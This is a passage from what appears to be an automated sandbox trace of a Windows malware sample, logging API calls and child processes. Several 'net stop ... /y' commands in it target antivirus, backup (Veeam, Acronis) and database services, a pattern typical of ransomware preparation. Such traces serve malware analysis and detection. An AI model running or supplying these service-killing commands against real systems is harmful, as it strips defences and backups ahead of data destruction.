lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.776] GetFileType (hFile=0x0) returned 0x0 [0113.776] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x723e68 [0113.776] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x723e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.776] WriteFile (in: hFile=0x0, lpBuffer=0x723e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fae4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fae4, lpOverlapped=0x0) returned 0 [0113.776] LocalFree (hMem=0x723e68) returned 0x0 [0113.776] GetFileType (hFile=0x0) returned 0x0 [0113.776] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x726110 [0113.776] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x726110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nr", lpUsedDefaultChar=0x0) returned 2 [0113.776] WriteFile (in: hFile=0x0, lpBuffer=0x726110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fae4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fae4, lpOverlapped=0x0) returned 0 [0113.776] LocalFree (hMem=0x726110) returned 0x0 [0113.776] _ultow (in: _Dest=0x889, _Radix=3537684 | out: _Dest=0x889) returned="2185" [0113.776] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.776] GetFileType (hFile=0x0) returned 0x0 [0113.776] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x726110 [0113.776] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x726110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.777] WriteFile (in: hFile=0x0, lpBuffer=0x726110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35faf0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35faf0, lpOverlapped=0x0) returned 0 [0113.777] LocalFree (hMem=0x726110) returned 0x0 [0113.777] GetFileType (hFile=0x0) returned 0x0 [0113.777] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x726110 [0113.777] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x726110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nr", lpUsedDefaultChar=0x0) returned 2 [0113.777] WriteFile (in: hFile=0x0, lpBuffer=0x726110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35faf0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35faf0, lpOverlapped=0x0) returned 0 [0113.777] LocalFree (hMem=0x726110) returned 0x0 [0113.777] NetApiBufferFree (Buffer=0x721af8) returned 0x0 [0113.777] NetApiBufferFree (Buffer=0x721b10) returned 0x0 [0113.777] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0113.777] exit (_Code=2) Process: id = "182" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1b976000" os_pid = "0x1228" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "72" os_parent_pid = "0xe30" cmd_line = "C:\\Windows\\system32\\net1 stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 569 os_tid = 0x122c [0113.535] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fef4 | out: lpSystemTimeAsFileTime=0x25fef4*(dwLowDateTime=0x176f1fb0, dwHighDateTime=0x1d6f0d1)) [0113.535] GetCurrentProcessId () returned 0x1228 [0113.535] GetCurrentThreadId () returned 0x122c [0113.535] GetTickCount () returned 0x114fb50 [0113.535] QueryPerformanceCounter (in: lpPerformanceCount=0x25feec | out: lpPerformanceCount=0x25feec*=23263620469) returned 1 [0113.536] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.536] __set_app_type (_Type=0x1) [0113.536] __p__fmode () returned 0x770331f4 [0113.536] __p__commode () returned 0x770331fc [0113.536] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.536] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.536] GetConsoleOutputCP () returned 0x1b5 [0113.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.541] sprintf_s (in: _DstBuf=0x25feac, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.542] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.657] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.657] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0113.657] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25fc78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.657] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x0, Size=0x76) returned 0x7ff658 [0113.657] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.658] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fe7c | out: Buffer=0x25fe7c*=0x801af8) returned 0x0 [0113.658] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fe7c | out: Buffer=0x25fe7c*=0x801b10) returned 0x0 [0113.658] _fileno (_File=0x77032900) returned -2 [0113.658] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.658] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.658] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.658] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.658] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.658] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.658] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.658] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.658] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.658] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.658] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.658] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.658] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.658] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.658] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.658] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.658] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.658] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.658] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.658] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.658] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.659] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.659] _wcsicmp (_String1="accounts", _String2="EPSecurityService") returned -4 [0113.659] _wcsicmp (_String1="computer", _String2="EPSecurityService") returned -2 [0113.659] _wcsicmp (_String1="config", _String2="EPSecurityService") returned -2 [0113.659] _wcsicmp (_String1="continue", _String2="EPSecurityService") returned -2 [0113.659] _wcsicmp (_String1="cont", _String2="EPSecurityService") returned -2 [0113.659] _wcsicmp (_String1="file", _String2="EPSecurityService") returned 1 [0113.659] _wcsicmp (_String1="files", _String2="EPSecurityService") returned 1 [0113.659] _wcsicmp (_String1="group", _String2="EPSecurityService") returned 2 [0113.659] _wcsicmp (_String1="groups", _String2="EPSecurityService") returned 2 [0113.659] _wcsicmp (_String1="help", _String2="EPSecurityService") returned 3 [0113.659] _wcsicmp (_String1="helpmsg", _String2="EPSecurityService") returned 3 [0113.659] _wcsicmp (_String1="localgroup", _String2="EPSecurityService") returned 7 [0113.659] _wcsicmp (_String1="pause", _String2="EPSecurityService") returned 11 [0113.659] _wcsicmp (_String1="session", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="sessions", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="sess", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="share", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="start", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="stats", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="statistics", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="stop", _String2="EPSecurityService") returned 14 [0113.659] _wcsicmp (_String1="time", _String2="EPSecurityService") returned 15 [0113.659] _wcsicmp (_String1="user", _String2="EPSecurityService") returned 16 [0113.659] _wcsicmp (_String1="users", _String2="EPSecurityService") returned 16 [0113.659] _wcsicmp (_String1="msg", _String2="EPSecurityService") returned 8 [0113.659] _wcsicmp (_String1="messenger", _String2="EPSecurityService") returned 8 [0113.660] _wcsicmp (_String1="receiver", _String2="EPSecurityService") returned 13 [0113.660] _wcsicmp (_String1="rcv", _String2="EPSecurityService") returned 13 [0113.660] _wcsicmp (_String1="netpopup", _String2="EPSecurityService") returned 9 [0113.660] _wcsicmp (_String1="redirector", _String2="EPSecurityService") returned 13 [0113.660] _wcsicmp (_String1="redir", _String2="EPSecurityService") returned 13 [0113.660] _wcsicmp (_String1="rdr", _String2="EPSecurityService") returned 13 [0113.660] _wcsicmp (_String1="workstation", _String2="EPSecurityService") returned 18 [0113.660] _wcsicmp (_String1="work", _String2="EPSecurityService") returned 18 [0113.660] _wcsicmp (_String1="wksta", _String2="EPSecurityService") returned 18 [0113.660] _wcsicmp (_String1="prdr", _String2="EPSecurityService") returned 11 [0113.660] _wcsicmp (_String1="devrdr", _String2="EPSecurityService") returned -1 [0113.660] _wcsicmp (_String1="lanmanworkstation", _String2="EPSecurityService") returned 7 [0113.660] _wcsicmp (_String1="server", _String2="EPSecurityService") returned 14 [0113.660] _wcsicmp (_String1="svr", _String2="EPSecurityService") returned 14 [0113.660] _wcsicmp (_String1="srv", _String2="EPSecurityService") returned 14 [0113.660] _wcsicmp (_String1="lanmanserver", _String2="EPSecurityService") returned 7 [0113.660] _wcsicmp (_String1="alerter", _String2="EPSecurityService") returned -4 [0113.660] _wcsicmp (_String1="netlogon", _String2="EPSecurityService") returned 9 [0113.660] _wcsupr (in: _String="EPSecurityService" | out: _String="EPSECURITYSERVICE") returned="EPSECURITYSERVICE" [0113.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x805448 [0113.731] GetServiceKeyNameW (in: hSCManager=0x805448, lpDisplayName="EPSECURITYSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x25fe18 | out: lpServiceName="", lpcchBuffer=0x25fe18) returned 0 [0113.741] _wcsicmp (_String1="msg", _String2="EPSECURITYSERVICE") returned 8 [0113.741] _wcsicmp (_String1="messenger", _String2="EPSECURITYSERVICE") returned 8 [0113.742] _wcsicmp (_String1="receiver", _String2="EPSECURITYSERVICE") returned 13 [0113.742] _wcsicmp (_String1="rcv", _String2="EPSECURITYSERVICE") returned 13 [0113.742] _wcsicmp (_String1="redirector", _String2="EPSECURITYSERVICE") returned 13 [0113.742] _wcsicmp (_String1="redir", _String2="EPSECURITYSERVICE") returned 13 [0113.742] _wcsicmp (_String1="rdr", _String2="EPSECURITYSERVICE") returned 13 [0113.742] _wcsicmp (_String1="workstation", _String2="EPSECURITYSERVICE") returned 18 [0113.742] _wcsicmp (_String1="work", _String2="EPSECURITYSERVICE") returned 18 [0113.742] _wcsicmp (_String1="wksta", _String2="EPSECURITYSERVICE") returned 18 [0113.742] _wcsicmp (_String1="prdr", _String2="EPSECURITYSERVICE") returned 11 [0113.742] _wcsicmp (_String1="devrdr", _String2="EPSECURITYSERVICE") returned -1 [0113.742] _wcsicmp (_String1="lanmanworkstation", _String2="EPSECURITYSERVICE") returned 7 [0113.742] _wcsicmp (_String1="server", _String2="EPSECURITYSERVICE") returned 14 [0113.742] _wcsicmp (_String1="svr", _String2="EPSECURITYSERVICE") returned 14 [0113.742] _wcsicmp (_String1="srv", _String2="EPSECURITYSERVICE") returned 14 [0113.742] _wcsicmp (_String1="lanmanserver", _String2="EPSECURITYSERVICE") returned 7 [0113.742] _wcsicmp (_String1="alerter", _String2="EPSECURITYSERVICE") returned -4 [0113.742] _wcsicmp (_String1="netlogon", _String2="EPSECURITYSERVICE") returned 9 [0113.742] NetServiceControl (in: servername=0x0, service="EPSECURITYSERVICE", opcode=0x0, arg=0x0, bufptr=0x25fe14 | out: bufptr=0x25fe14) returned 0x889 [0113.778] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.778] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.779] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.780] GetFileType (hFile=0x0) returned 0x0 [0113.780] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x803e68 [0113.780] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x803e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.780] WriteFile (in: hFile=0x0, lpBuffer=0x803e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x25fd54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd54, lpOverlapped=0x0) returned 0 [0113.780] LocalFree (hMem=0x803e68) returned 0x0 [0113.780] GetFileType (hFile=0x0) returned 0x0 [0113.780] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806110 [0113.780] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0113.780] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fd54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd54, lpOverlapped=0x0) returned 0 [0113.780] LocalFree (hMem=0x806110) returned 0x0 [0113.780] _ultow (in: _Dest=0x889, _Radix=2489732 | out: _Dest=0x889) returned="2185" [0113.780] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.780] GetFileType (hFile=0x0) returned 0x0 [0113.780] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x806110 [0113.780] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x806110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.780] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x25fd60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd60, lpOverlapped=0x0) returned 0 [0113.780] LocalFree (hMem=0x806110) returned 0x0 [0113.781] GetFileType (hFile=0x0) returned 0x0 [0113.781] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806110 [0113.781] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0113.781] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fd60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd60, lpOverlapped=0x0) returned 0 [0113.781] LocalFree (hMem=0x806110) returned 0x0 [0113.781] NetApiBufferFree (Buffer=0x801af8) returned 0x0 [0113.781] NetApiBufferFree (Buffer=0x801b10) returned 0x0 [0113.781] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0113.781] exit (_Code=2) Process: id = "183" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x21355000" os_pid = "0x124c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Acronis VSS Provider” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 570 os_tid = 0x1250 Process: id = "184" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1f95b000" os_pid = "0x1254" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:00066beb" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 571 os_tid = 0x1258 Thread: id = 572 os_tid = 0x1264 Thread: id = 573 os_tid = 0x1268 Thread: id = 613 os_tid = 0x126c Thread: id = 724 os_tid = 0xf84 Thread: id = 726 os_tid = 0xb7c Thread: id = 773 os_tid = 0x844 Thread: id = 825 os_tid = 0xc3c Process: id = "185" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1ff5a000" os_pid = "0x12a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop macmnsvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 576 os_tid = 0x12a4 Process: id = "186" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6ca5f000" os_pid = "0x12a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Clean Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 577 os_tid = 0x12ac Process: id = "187" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20d64000" os_pid = "0x12b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 578 os_tid = 0x12b4 Process: id = "188" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20569000" os_pid = "0x12b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 579 os_tid = 0x12bc Process: id = "189" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20e6e000" os_pid = "0x12c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 580 os_tid = 0x12c8 Process: id = "190" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6d073000" os_pid = "0x12d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 581 os_tid = 0x12d4 Process: id = "191" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20678000" os_pid = "0x12dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 582 os_tid = 0x12e0 Process: id = "192" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1fc7d000" os_pid = "0x12e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 583 os_tid = 0x12ec Process: id = "193" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20682000" os_pid = "0x12f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 